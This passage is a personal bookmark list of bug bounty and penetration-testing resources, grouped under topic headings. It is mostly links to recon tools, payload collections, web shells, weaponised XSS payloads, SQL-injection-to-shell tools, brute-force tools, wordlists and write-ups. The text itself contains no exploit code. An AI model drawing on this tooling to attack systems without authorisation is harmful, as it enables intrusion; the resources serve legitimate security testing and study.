https://github.com/blackhatethicalhacking/meg/compare/master...tomnomnom:meg:master\n  https://github.com/tomnomnom/meg/compare/master...3lpsy:megurl:master\n  https://github.com/tomnomnom/meg/compare/master...Cgboal:meg:master\n  https://github.com/tomnomnom/meg/compare/master...1ndianl33t:meg:master\n  https://github.com/tomnomnom/meg/compare/master...GwynHannay:meg:master\n  \nMethodologies (Hackers)\n   Cyberheartmi Methodology   https://gist.github.com/cyberheartmi9/1ac77d171d9b9dc9a5be45fa4f4c8dcb\n   Bug Bounty Mini Course:Automated Recon  https://www.youtube.com/watch?v=0VOWgM4klpM&amp;list=WL&amp;index=19&amp;t=53s\n   Zseanos Methodology https://www.bugbountyhunter.com/methodology/zseanos-methodology.pdf\n \n \nMime Type Sniffing\nhttps://www.keycdn.com/support/what-is-mime-sniffing\n\nMindmaps \n  List of Attack Vectors http://www.tecapi.com/public/relative-vulnerability-rating-gui.jsp\n  Huge Mind Map. Lots of resources. Has All Exploits and a lot of good info. https://www.xmind.net/m/Xy7XEW/\n  Collaborative Mindmaps - Collaborative Mind Mapping \n\nMobile\n  https://github.com/skateforever/pentest-scripts/tree/main/mobile\n  https://www.veracode.com/blog/2010/12/mobile-app-top-10-list \n  \nMootools\n  https://github.com/BlackFan/client-side-prototype-pollution/blob/master/pp/mootools-more.md\n  mootools 1.4.5 vuln \n    https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-31812/summary\n    Vulnerable Line https://github.com/vsviridov/mootools-node/commit/0fcc500aa1be356bc8745b322e8182f38ec8f0a0#diff-c4d2ea9c35bf14dd01cf28b174dba68fca9d2d9a2ae4b63d48ee496d7e9deedbR360-R367 \n    poc https://snyk.io/test/npm/mootools/1.4.5\nNmap\n  https://tecadmin.net/scanning-open-ports-with-nmap/inif\n  nmap pwn https://gist.github.com/BU9D4DDY/3e31890ae407e7c41a00f3715d00c5d7\n\nNodejs hacking\nhttps://github.com/zactly/handouts/blob/master/node_js_generic_checks.md\n\nOneliners\n    automate prototype polution https://twitter.com/R0X4R/status/1402906185301323776\n    https://github.com/D4Vinci/One-Lin3rt\n\n  https://github.com/Excloudx6/Elsfa7110-Oneliner-bughunting\n  https://hackingblogs.com/bug-bounty-builder-project-tool-use/#ONE-LINERRECONfor_FUZZ_XSS\n  https://github.com/KingOfBugbounty/KingOfBugBountyTips/compare/master...halencarjunior:KingOfBugBountyTips:master\n  https://www.youtube.com/watch?v=ZcG8ARatgs0&amp;t=467s\n  https://giters.com/okaayfine/oneliner-bugbounty\n  https://twitter.com/ofjaaah/status/1532581839344394241\n  https://gist.github.com/cyberheartmi9/c993542044fdc45834837c3f88484a63\n  https://github.com/trimstray/the-book-of-secret-knowledge\n\nOpen Redirects\nhttps://github.com/tomnomnom/meg/compare/master...1ndianl33t:meg:master\nhttps://www.infosecmatter.com/bug-bounty-tips-1/#5-top-25-open-redirect-dorks\nhttp://www.thespanner.co.uk/2014/03/21/rpo/\nhttps://nostarch.com/download/samples/RealWorldBugHunting_Ch02_Sample.pdf\nhttps://i.blackhat.com/asia-19/Fri-March-29/bh-asia-Wang-Make-Redirection-Evil-Again-wp.pdf\nhttps://devcraft.io/2020/10/19/github-gist-account-takeover.html\nhttps://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirecthttps://blog.intigriti.com/hackademy/open-redirect/\nhttp request smugglin open redorect defparam https://www.youtube.com/watch?v=3tpnuzFLU8g\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/understanding-and-discovering-open-redirect-vulnerabilities/\nhttps://corneacristian.medium.com/top-25-open-redirect-bug-bounty-reports-5ffe11788794\nhttps://www.youtube.com/watch?v=4Jk_I-cw4WE\nhttps://www.youtube.com/watch?v=grkMW56WX2E\n  https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Open%20Redirect/Intruder/open_redirect_wwwist.txt\n  https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Open%20Redirect/Intruder/openredirects.txt\n  https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Open%20Redirect/Intruder/Open-Redirect-payloads.txt\n  https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html\n  https://github.com/AnLoMinus/Bug-Bounty/blob/2d654a0a62c1194564aa841745c171c4b1374252/Checklist/Web%20App/Upload%20Function.md\nhttps://github.com/Excloudx6/open-redirect-payload-list\n * [Learn with @DarkLotusKDB: Recon with Shodan &amp; Spyse,XSS, Bypass OpenRedirects, SSRF, BugBunty Bot!!!](https://www.youtube.com/watch?v=66HqaFCF4Kk)\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect\n  https://web.archive.org/web/20201130145910/https://github.com/ptswarm/ptswarm-twitter/blob/main/2020-11-30-open-redirect-params.txt\nhttps://giters.com/okaayfine/oneliner-bugbounty#open-redirect\nhttps://infosecwriteups.com/bugbounty-linkedln-how-i-was-able-to-bypass-open-redirection-protection-2e143eb36941\nTnom and ori https://youtu.be/SYExiynPEKM?t=2630\n\nOwasp Top 10 (2021) https://cwe.mitre.org/data/definitions/1344.html\nParams\n  More Silent wheb running https://github.com/0xecho/parameth\n  Normal Branch https://github.com/maK-/parameth\n  Docker support https://github.com/Shaked/parameth\n  \nParameter Tampering - \n  http://www.tecapi.com/public/rvr-view-attack-vector-gui.jsp?antiCsrfToken=null&amp;attackVectorId=57\n\nPayloads / POCs\n    https://github.com/knownsec/pocsuite3\nhttps://github.com/pranav77/XSS-using-SVG-file\n  https://github.com/Excloudx6/Public/tree/master/payloads\n  https://github.com/sh377c0d3/Payloads/fork\n  https://github.com/RootUp/PersonalStuff\n  https://github.com/swisskyrepo/PayloadsAllTheThings \n  https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open\n  https://portswigger.net/research/top-10-web-hacking-techniques-of-2019\n  https://portswigger.net/research/top-10-web-hacking-techniques-of-2020-nominations-open\n  https://portswigger.net/research/top-10-web-hacking-techniques-of-2020\n  https://portswigger.net/research/top-10-web-hacking-techniques-of-2021-nominations-open\n  https://portswigger.net/research/top-10-web-hacking-techniques-of-2021\n  https://portswigger.net/research/top-10-web-hacking-techniques\n  https://portswigger.net/research/so-you-want-to-be-a-web-security-researcher#forgottenknowledge\n\nPOC Videos\n  https://repo.telematika.org/project/bminossi_allvideopocsfromhackerone/\n  https://github.com/zeroc00I/AllVideoPocsFromHackerOne\n\nPassword Cracking\n  https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-dg.pdf\n\nPeople \ntnom interview https://gist.github.com/ruevaughn/00638360841b2bec94149080c4f04f28\nAshar Jahvid https://twitter.com/soaj1664ashar\n\nProducts / Services \nTobuy https://order.shareit.com/cart/view | https://tryhackme.com/why-subscribe | https://findomain.app/#Pricing | https://github.com/Excloudx6/InfoSec-Black-Friday | HAKLUKE RECOMENDS https://securitytrails.com/corp/osint-toolkit?referral_code=LLDAK0F80M\n\n\nProtype Pollution\n  automate https://twitter.com/R0X4R/status/1402906185301323776\n  https://www.kitploit.com/2021/09/plution-prototype-pollution-scanner.html\n  https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0\n  https://github.com/kosmosec/proto-find\n  https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution\n  https://github.com/BlackFan/client-side-prototype-pollution\n  https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/\n  https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf\nhttps://www.youtube.com/watch?v=Gv1nK6Wj8qM&amp;t=1558s\nppmap \n  https://blog.intigriti.com/2021/07/14/bug-bytes-131-credential-stuffing-in-bug-bounty-hijacking-shortlinks-hacker-shows/\n  https://www.geeksforgeeks.org/ppmap-a-scanner-or-exploitation-tool-written-in-go/\n  https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution\nPrototype polution Tools\n  https://github.com/msrkp/PPScan\n\n\n\nPython\nhttps://hackernoon.com/10-common-security-gotchas-in-python-and-how-to-avoid-them-e19fbe265e03?utm_source=pocket-ff-recs\n\nRails\n  https://github.com/zactly/handouts/blob/master/oss_apps.md\n  https://github.com/zactly/handouts/blob/master/materials.md\n  https://github.com/gramantin/awesome-rails#apps-made-with-rails\n  Mass Assignment https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html\n  https://code.tutsplus.com/tutorials/mass-assignment-rails-and-you--net-31695\n  https://www.cloudbees.com/blog/preproduction-checklist-for-a-rails-app?utm_source=rubyweekly&amp;utm_medium=email\n  https://youtu.be/CIhHpkybYsY?t=1171\n  https://github.com/zactly/handouts/find/master\n  https://github.com/zactly/handouts/blob/master/conferences/virtual-appsecday-2020/skea_rails_routes.md\n  \n \nRecon\n  https://github.com/003random/003Recon\n  https://raw.githubusercontent.com/anshumanbh/domain/master/enumall.py\n  Reconmap GUI Website SaaS https://demo.reconmap.com/login\n  https://github.com/0xbharath/assets-from-spf\n  https://mavericknerd.github.io/knowledgebase/BugBountyRecon/\n  https://www.bugbountyhunter.com/methodology/zseanos-methodology.pdf   \n  https://ulir.ul.ie/bitstream/handle/10344/8278/Nuseibeh_2019_Text.pdf?sequence=2\n  https://github.com/janmasarik/resolvers\n  https://github.com/janmasarik/resolvers/pull/31/files\n\nResolvers\n  https://github.com/janmasarik/resolvers/pull/31/files\n  https://github.com/janmasarik/resolvers\n\n\nReporting\n  https://cheatsheetseries.owasp.org/cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html\n\nReflected File Downloads\n Reflected File Download - A New Web Attack Vector https://www.youtube.com/watch?v=dl1BJUNk8V4\n https://blog.davidvassallo.me/2014/11/02/practical-reflected-file-download-and-jsonp/\nhttps://drive.google.com/file/d/0B0KLoHg_gR_XQnV4RVhlNl96MHM/view?resourcekey=0-NV7cTUTB48bltMEddlULLg\nhttps://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf\nhttps://www.davidsopas.com/reflected-file-download-cheat-sheet/\n\nRegexp\n  Regexp Basics https://www.youtube.com/watch?v=KJG1dETacLI\n  https://regexr.com/\n\nResources\n  https://portswigger.net/research/web-cache-entanglement\n  https://github.com/AnLoMinus/Bug-Bounty\n  https://github.com/ngalongc/bug-bounty-reference\n  https://www.youtube.com/c/krypt0muxbugbounty\n  https://github.com/OWASP/www-chapter-czech-republic/blob/master/slides/Getting_Started_with_Bug_Bounty.pdf\n  https://github.com/OWASP/www-chapter-czech-republic/blob/master/slides/Hacking_101.pdf\n  https://github.com/OWASP/www-chapter-czech-republic/blob/master/slides/Adela_Hanikova_All_roads_lead_to_domain_admin.pdf\n  https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE\n  Really good bug bounty playlist https://www.youtube.com/watch?v=FeXloh12Mnw&amp;list=PLlrnAg4kKF3r26OIyfoYQQ-YqySE3fyE_&amp;index=2\n  When looking for something ot hack https://web.archive.org/web/20210420062735/https://help.intrigue.io/reference/intrigue-core-api-endpoints\n  The 5 Hacking NewsLetter 107 - https://pentester.land/newsletter/2020/05/27/the-5-hacking-newsletter-107.html\n  Cloud Metadata - https://gist.github.com/rudSarkar/39f821249bf0d38093cafbfd23bc33ee | https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb\n  Megathread https://twitter.com/ITSecurityguard/status/1519272305729458176\n  Reset Passwprd https://docs.google.com/presentation/d/1QzBl3k3n2q44ULyfZgr_gPZexj8nF5vD8JrS5AUJRbs/edit#slide=id.gb5aea10a86_0_167\n  Bug Bounty Google Doc https://docs.google.com/presentation/d/1o7GWUOYwcd3uMwLBRG9UzARYCvfuX3VKUHfoPu38t78/edit\n  Bug Bounty Udemy Courses Tip https://twitter.com/ITSecurityguard/status/1519272305729458176 \n  https://github.com/carlospolop/PEASS-ng \n  Saturday Night Bug Bounty Bytes w/ Ch1-R0n1n  https://www.youtube.com/watch?v=xx5fF7i-dCQ\n  Nicolas Gr\u00e9goire - Hunting for Top Bounties  https://www.youtube.com/watch?v=mQjTgDuLsp4\n  Hacktify Playlist to learn hacking https://www.youtube.com/watch?v=NBCrlRqX2AY&amp;list=RDCMUCS82DNnKOhXHcGKxGzQvNSQ&amp;start_radio=1&amp;rv=NBCrlRqX2AY&amp;t=0\n  \nRNG http://www.math.sci.hiroshima-u.ac.jp/m-mat/MT/ARTICLES/earticles.html  \n\nRPO (Relative Path overide) Gadgets \n  https://blog.innerht.ml/rpo-gadgets/\n  https://www2018.thewebconf.org/proceedings/\n  https://blog.acolyer.org/2018/05/28/large-scale-analysis-of-style-injection-by-relative-path-overwrite/\n  https://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf\n  https://portswigger.net/research/detecting-and-exploiting-path-relative-stylesheet-import-prssi-vulnerabilities\ninurl:/.well-known/security ext:txt -hackerone -bugcrowd -synack -openbugbount\n\nSAML\nhttps://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/\nhttps://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91.pdf\nhttps://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/\n\nScanners\n  2020_3452\nhttps://www.zoomeye.org/\nhttps://searchcode.com/\nhttps://fullhunt.io/\nhttps://github.com/RustScan/RustScan\nhttps://github.com/knassar702/scant3r\n\nS3 buckets \n  https://github.com/sa7mon/S3Scanner\n   Dumping S3 Buckets | Exploiting S3 Bucket Misconfigurations https://www.youtube.com/watch?v=ITSZ8743MUk\n   https://support.cloudflare.com/hc/en-us/articles/360037983412-Configuring-an-Amazon-Web-Services-static-site-to-use-Cloudflare\n\nSecond Order Takeovers\n  Shubbs Talking about it in his 5 years of hacking talk. Good. https://youtu.be/iG7-c0YbhbM?t=1472\n\nSelf Hosting \n  https://honoki.net/2021/07/11/wilson-cloud-respwnder/\n  Shodan like nmap results parser (https://github.com/shivammehta007/ScanX) PBNJ(http://pbnj.sourceforge.net/) (A suite of tools to monitor change in a network over time) store NMAP Results in a database to monitor changes on a network over time and then conducts historical analysis to identify new hosts - \n\nScripts\n  LFI https://web.archive.org/web/20100228162410/http://pastie.org/840199\n  https://github.com/killswitch-GUI/PenTesting-Scripts\n\nSession Poisoning - https://en.wikipedia.org/wiki/Session_poisoning \n https://github.com/t1m4/ptl_lab\n \nSetup\n  Bug Bounty Tools Setup - https://github.com/oliveira-andre/bug_bounty_tools\n  Redherd - https://redherd.readthedocs.io/en/latest/ | https://www.youtube.com/channel/UCYSM51oldVsryhZxGdB3hXA\n\nShells\n  https://github.com/tennc/webshell/blob/master/README_EN.md\n\nSmart Contracts\n  https://github.com/SecurityInnovation/Smart-Contract-CTF\n\nSSRF\n  SSRF HTTP Bypass List https://pastebin.com/YbsKrMpf\n SSRF - Practical  by Hacktify https://www.youtube.com/watch?v=NBCrlRqX2AY\nhttps://reconshell.com/jira-mobile-ssrf-exploit/\nhttps://gowthams.gitbook.io/bughunter-handbook/list-of-vulnerabilities-bugs/ssrf\n\n\nSubdomain Takeovers\n  https://github.com/mhmdiaa/tko-subs\n  https://github.com/mhmdiaa/second-order\nhttps://0xpatrik.com/subdomain-takeover-ns/\nhttps://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/\nhttps://www.hackerone.com/application-security/guide-subdomain-takeovers\nhttps://medium.com/@thebuckhacker/how-to-do-55-000-subdomain-takeover-in-a-blink-of-an-eye-a94954c3fc75\nhttps://import.cdn.thinkific.com/359809/courses/1386931/locomotivesubdomaintakeover-210608-154821.yamll\nhttps://github.com/buckhacker/SubDomainTakeoverTools\ngithub.com/lukasikic/subzy \n    -&gt; https://gist.githubusercontent.com/ruevaughn/91d3369fdf0d93b0bdc6662c771cb7ae/raw/79e07b315e465bae1f003ec8fd40fcf5471b223b/fingerprints.json\ngithub.com/mhmdiaa/second-order\n\nSubmitting a report\nhttps://about.gitlab.com/blog/2020/09/28/top-tips-for-better-bug-bounty-reports-and-a-hacker-contest/\n\nSQL INjection\nhttps://www.cloudflare.com/learning/security/threats/sql-injection/\n\nShodan\n  Awesome Shodan Queries https://github.com/jakejarvis/awesome-shodan-queries\n  Shodan Dorks https://twitter.com/0xhunster/status/1548382647759491074/photo/1\n  Shodan CVE Dorks Kathan https://kathan19.gitbook.io/howtohunt/sensitive-info-leaks/shodan_cve_dorks\n  https://carbon.now.sh/6nEp25xrtuu53L6aquU4\n  https://twitter.com/kotylevskiy/status/1551926067908182018/photo/1\nStatus Codes\n  Web status codes https://requests.readthedocs.io/en/latest/api/#status-code-lookup\n  \nSQL Injection\nhttps://github.com/ladecruze/Exploits/blob/master/sqlexploit.js\n  https://book.hacktricks.xyz/pentesting-web/sql-injection\n  (at the bottom of the page, the image and text for 2 sqli x-forwarded-for tips) https://medium.com/pentesternepal/access-control-worth-2000-everyone-missed-this-idor-access-control-between-two-admins-9745eaf15d21\n  https://github.com/0xEval/sql2shell\n  \nSource Code Analysis\n  https://twitter.com/dhakal_ananda/status/1544574015779606529\n\nTakeovers\n  https://github.com/musana/mx-takeover\n  \nTiming Attacks\nTime Attacks http://www.tecapi.com/public/relative-vulnerability-rating-gui.jsp?antiCsrfToken=null&amp;filterCategory=9\n\nTips\n  Parse Github URls https://github.com/ruevaughn/git-url-parse\n  Randomize IPs https://gist.github.com/yehgdotnet/27114d4bb5b28ec093e6dd36e329c389\n\n  Find IP Address behind CDN\n    \t\thttps://github.com/mandatoryprogrammer/cloudflare_enum\n    https://infosecwriteups.com/finding-the-origin-ip-behind-cdns-37cd18d5275\n    https://zdresearch.com/finding-the-origin-ip-behind-cdns/\n    https://twitter.com/HolyBugx/status/1343156549162852352?s=20 \n  Test Shodan Queries https://app.netlas.io/responses/\n  https://bbinfosec.medium.com/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248\n  https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/bugbountytips.md\n  King of Bug Bounty Tips - https://github.com/KingOfBugbounty/KingOfBugBountyTips\n  https://abhinavprasad47.github.io/bugbounty-starter-notes/\n  https://www.google.com/search?tbm=bks&amp;q=recon-ng\n  gh dork: https://github.com/topics/one-liners\n  Sqlmap tip - https://youtu.be/rVu0GUjic_g?t=2246\n  Eval command and security issues https://mywiki.wooledge.org/BashFAQ/048\n  \ud83c\udf1f Find company's owned domains (company.*) with these #googledorks: | https://twitter.com/nil0x42/status/1533094473067995137 \n  https://redhuntlabs.com/nvadr\nTodo\n    read https://docs.github.com/en/code-security/secret-scanning/about-secret-scanning\n      https://tillsongalloway.com/finding-sensitive-information-on-github/\nTODO: Make a worldist from these Amazon Cognito API actions GetUser etc https://docs.aws.amazon.com/cognito-user-identity-pools/latest/APIReference/API_AdminGetUser.html\n\n\nTools\n  https://github.com/ladecruze/Subdorker/fork\n   Brute Force Tomcat https://github.com/Excloudx6/tomcter\n  Code Snippets\n    https://carbon.now.sh/snippets\n  HTML Tools (CSV To HTML, Regexpal, 50+ tools) \n    https://www.cleancss.com/join.php\n  \n\n  Arjun                 \n    https://github.com/s0md3v/Arjun/wiki/Usage#scan-a-single-url  \n  crobat                    \n    https://www.onsecurity.io/blog/how-i-made-rapid7s-project-sonar-searchable/\n  Dom Invader               \n    https://www.youtube.com/watch?v=GeqVMOUugqY\n  ffuf                      \n    https://mikekitckchan.medium.com/holy-ffuf-a-beginner-guide-to-fuzz-with-ffuf-4bc6a66b5391 | https://thexssrat.medium.com/what-the-fuzz-the-truth-behind-content-discovery-77cd0c0756e7\n  gf       \n    Automate GF and gau https://gist.github.com/BU9D4DDY/eea5f7580577d9bf5d009ce923bac4fe\n    https://rengine.wiki/usage/tool_conf/ \n    https://github.com/1ndianl33t/Gf-Patterns \n    https://github.com/halencarjunior/BugBuntu/wiki/Installing-Gf-Patterns \n    https://github.com/NitinYadav00/gf-patterns/fork \n    https://twitter.com/sratarun/status/1361209626478276610 \n    MORE GF TEMPLATES https://github.com/lutfumertceylan/top25-parameter/releases/tag/v1.0.7 \n    https://github.com/tomnomnom/gf/compare/master...pry0cc:jf:master | \n    https://github.com/ResistanceIsUseless/gf | \n    https://github.com/tomnomnom/gf/compare/master...medbsq:gf:master | \n    https://github.com/mrofisr/gf-patterns\n    \n  gee                       \n    Similar to Tee. More Functionality. https://github.com/hahwul/gee\n    Gee Tips https://twitter.com/hahwul/status/1360495560843689989\n  FFMPEG-AVI-m3u-xbin       - https://github.com/Excloudx6/ffmpeg-avi-m3u-xbin\n  metabigor v2              - Metabigor https://twitter.com/j3ssiejjj/status/1528687407587299330/photo/1\n  pywhat -- Identify anything. pyWhat easily lets you identify PI from pcap files\n    https://github.com/bee-san/pyWhat/fork\n  recon-ng  https://raw.githubusercontent.com/anshumanbh/domain/master/enumall.py\n  SimpleApachePathTraversal - https://github.com/MrCl0wnLab/SimplesApachePathTraversal\n  Source2Url                - \n  \n  Tmux \n    tmux or screen https://youtu.be/a8LaNydbJyA?t=6406\n\n  \n  Tracy\n    https://newsroom.nccgroup.com/\n    https://github.com/nccgroup/tracy/blob/master/src/js/database-worker.js\n    https://github.com/nccgroup/tracy\n  \n  UrlEncode/Decode\n    https://www.w3schools.com/tags/ref_urlencode.ASP\n    https://network-tools.com/url-encode/\n    https://www.url-encode-decode.com/\n\nVulnerable Things\n  https://github.com/kiwicom/xssable\n   https://github.com/janmasarik/dumb-password-rules\n https://github.com/duffn/dumb-password-rules/fork\n \n \n WhatWeb                   - https://github.com/urbanadventurer/WhatWeb\n  WFUZZ                     - https://book.hacktricks.xyz/pentesting-web/web-tool-wfuzz\nwwwwwww\nahttps://useragent.me/\n\nWordlists\nhttps://gist.github.com/random-robbie/0f9d24a7b3c7268ee0c1ecdbe280611b\n  http://web.mit.edu/~mkgray/jik/src/Attic/kerberos_password_hacker/allwords\n  https://web.archive.org/web/20201130145910/https://github.com/ptswarm/ptswarm-twitter/blob/main/2020-11-30-open-redirect-params.txt\n  https://github.com/mhmdiaa/chronos\n  https://github.com/d4rckh/gorilla\n  https://github.com/jim3ma/crunch\n  https://github.com/the-xentropy/samlists/fork\n  https://github.com/AyProductions-Team/NEXTdependencydownloader/blob/588fa54b77743f808feec88070a4a0c76ac7c993/bin/Debug/net6.0-windows/DependencyDownloader.exe.WebView2/EBWebView/ZxcvbnData/3.0.0.0/passwords.txt\n  https://gist.github.com/random-robbie/c9671939d029848df38e06c5383e6395\n  Common Config Files by Tomnomnom   https://github.com/tomnomnom/meg/blob/master/lists/configfiles\n  Short Wordlist by Tomnomnom https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51\n  https://github.com/giteshnxtlvl/cook\n  https://imgur.com/user/silverblack1111/New%20Folder\n  https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056\n  https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/iam_user_enum/default-word-list.txt\n  https://github.com/koaj/aws-s3-bucket-wordlist\n  https://github.com/Karanxa/Bug-Bounty-Wordlists\n  FUZZ.txt good -https://gist.github.com/m4ll0k/50efec5f04179b107c9d7597eec7d23c\n  https://gist.github.com/m4ll0k/https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d\n  Stream: Creating Target Specific Wordlist!!  https://www.youtube.com/watch?v=AF-zp6DROTs\n  API Endpoints https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d\n  https://bendtheory.medium.com/finding-and-exploiting-unintended-functionality-in-main-web-app-apis-6eca3ef000af\n  https://wordlists.assetnote.io/\n  https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056\n  https://github.com/six2dez/OneListForAll/blob/main/onelistforallmicro.txt\n  https://gist.github.com/miguelmota/706ebaeb661e246e1b682c400d49d1c9\n  https://github.com/ghostlulzhacks/wordlist/blob/master/directory-brute-wordlist.txt\n  to harvest https://youtu.be/YO3ldj4jkJk?t=275\n  Common Bucket Names https://github.com/buckhacker/buckhacker/blob/master/resources/common-bucket-names.txt\n  https://portswigger.net/web-security/authentication/auth-lab-passwords\n  https://portswigger.net/web-security/authentication/auth-lab-usernames\n  https://github.com/SmeegeSec/SmeegeScrape\n  make a wl from js https://gist.github.com/seqrity/d67608eb6372cd6f455bfeeefa77b9c2\n  Who what where when tomnomnom - https://www.youtube.com/watch?v=W4_QCSIujQ4\n  https://pentestbook.six2dez.com/recon/webs-recon Wordlist Gen\n  https://github.com/giteshnxtlvl/cook\n  https://gitlab.com/kalilinux/packages/amass/-/tree/91a5313226ab9ebd4ecbad40622584dd6f3f7cd5/wordlists Wordlists\n\n\n  \nWriteups\n  https://github.com/kh4sh3i/bug-bounty-writeups\n  securityforeveryone.com/scan-repository\n  2022-07-15 Exploiting Arbitrary Object Instantiations in PHP without Custom Classes  https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/\n  https://github.com/fardeen-ahmed/Bug-bounty-Writeups\n  https://github.com/devanshbatham/Awesome-Bugbounty-Writeups\n  https://twitter.com/ITSecurityguard/status/1519272305729458176\n  https://github.com/ngalongc/bug-bounty-reference\n  \n  https://github.com/djadmin/awesome-bug-bounty\n  https://ysamm.com/#\n  https://tarekbouali.com/posts/how-i-hacked-one-of-the-biggest-airlines-group-of-the-world/\n  https://github.com/jaiswalakshansh/Facebook-BugBounty-Writeups\n  https://infosecwriteups.com/intro-to-bug-bounty-automation-tool-chaining-with-bash-13e11348016f\n  https://hacklido.com/u/excloudx\n  https://subscription.packtpub.com/book/ssnetworking-and-servers/9781788626897/7/ch07lvl1sec47/example\n  https://subscription.packtpub.com/owned\n  https://id.bugbountyhub.com/auth/realms/bugbountyhub/login-actions/authenticate?execution=a484e1a7-bc42-472b-a339-15be49996b14&amp;client_id=prod-platform&amp;tab_id=MivkVulj_p8\n  https://prashantbhatkal2000.medium.com/svg-based-stored-xss-ee6e9b240dee\n  https://github.com/phlmox/public-reports/blob/main/hackerone-one-million-reports\n  https://footstep.ninja/posts/\n  https://twitter.com/omespino/status/1489310300708900868/photo/\n  https://github.com/phlmox/public-reports\n  https://blog.assetnote.io/2020/09/15/hacking-on-bug-bounties-for-four-years/\n  https://discord.com/channels/772850979955671103/772854181433573398/895230570366402590 Hacking Articles\n\nVhosts\n  https://github.com/Shaked/vhost-finder\n  Vhost Discovery https://github.com/projectdiscovery/tlsx#sancn-probe\n\nVPS\nhttps://github.com/bbhunter/pentest-scripts/blob/main/useful/get-tools.sh\nhttps://github.com/crawlab-team/crawlab\n  https://github.com/righettod/toolbox-pentest-web\n  google cloud official repos https://github.com/googleapis/google-cloud-ruby\n  google cloud repos https://github.com/orgs/4ARMED/repositories\n  Certifcate install   https://github.com/anshumanbh/terraform-burp-collaborator#using-a-proper-tls-certificate\n  https://github.com/orgs/4ARMED/repositories\n  Teraform Burp Colab server https://github.com/anshumanbh/terraform-burp-collaborator\n  Setup script for Regon-ng  and altdns https://github.com/jhaddix/domain\n  https://github.com/AntSwordProject/antSword\n  https://github.com/janmasarik/resolvers/blob/master/.github/workflows/main.yml\n  https://github.com/pry0cc/axiom/tree/master/images/provisioners\n  https://github.com/janmasarik/resolvers\n  Assetnote Setup and Installation   https://gist.github.com/sz3n/1fdf2f871a10d4e9180757afc8fd80e2\n  https://demo.ezxss.com/manage/dashboard\n  https://github.com/ssl/ezXSS/wiki/Installation\n  https://honoki.net/2021/07/11/wilson-cloud-respwnder/\n  https://github.com/ruevaughn/assetnote\n  https://github.com/robre/jsmon\n  Host and Deploy Assetnote https://gist.github.com/BU9D4DDY/9e023d0fae3314273302ae895ae7c5ed\n  vps_install.sh by Rajchowdhury420 https://gist.github.com/Rajchowdhury420/24fa500ebc4edbb2018860f85f93b8cf\n  https://hackingblogs.com/bug-bounty-builder-project-tool-use/\n  Beats - Lightweight shippers for Elasticsearch &amp; Logstash \n  https://github.com/nicolargo/glances\n  https://github.com/intrigueio/intrigue-core/wiki/Setting-up-a-Development-Environment-%28on-Ubuntu%2C-Kali%2C-Debian%29\n  https://www.udemy.com/course/learn-website-hacking-penetration-testing-from-scratch/learn/lecture/5878090?start=0#overview\n  Pt a website onlne https://www.youtube.com/watch?v=NQP89ish9t8\n  https://www.trenchesofit.com/2021/06/14/bug-bounty-vps-build/\n  https://github.com/intrigueio/intrigue-core/wiki/Setting-up-a-Development-Environment-%28on-Ubuntu%2C-Kali%2C-Debian%29\n  https://github.com/AlexisAhmed/BugBountyToolkit &lt;-- docker \n\nWhitepapers\nhttps://github.com/zactly/handouts/tree/master/conferences\n\nxss\nhttps://github.com/kiwicom/xssable\nhttps://twitter.com/soaj1664ashar\n  https://github.com/pranav77/XSS-using-SVG-file\n  https://www.openbugbounty.org/blog/devl00p/top-100-xss-dorks/\n  xss - https://threadreaderapp.com/thread/1508406052663934979.html\n  https://google-gruyere.appspot.com/\n  https://0x1.gitlab.io/web-security/Weaponised-XSS-Payloads/\n  https://infosecwriteups.com/weaponizing-reflected-xss-to-account-takeover-ae8aeea7aca3\n  https://hakluke.medium.com/upgrade-xss-from-medium-to-critical-cb96597b6cc4\n  https://github.com/hakluke/weaponised-XSS-payloads\n  https://medium.com/redteam/weaponising-angularjs-bypasses-4e59790a730a\n  https://github.com/dwisiswant0/findom-xss\n  https://www.secureideas.com/blog/2018/12/twelve-days-of-xssmas.html\n  https://www.geeksforgeeks.org/findom-xss-fast-dom-based-xss-vulnerability-scanner/?ref=rp\n  https://thexssrat.podia.com/free-labs\n  https://github.com/topics/xss\n  https://twitter.com/ofjaaah/status/1504932805431767046\n  https://portswigger.net/research/new-xss-vectors\n  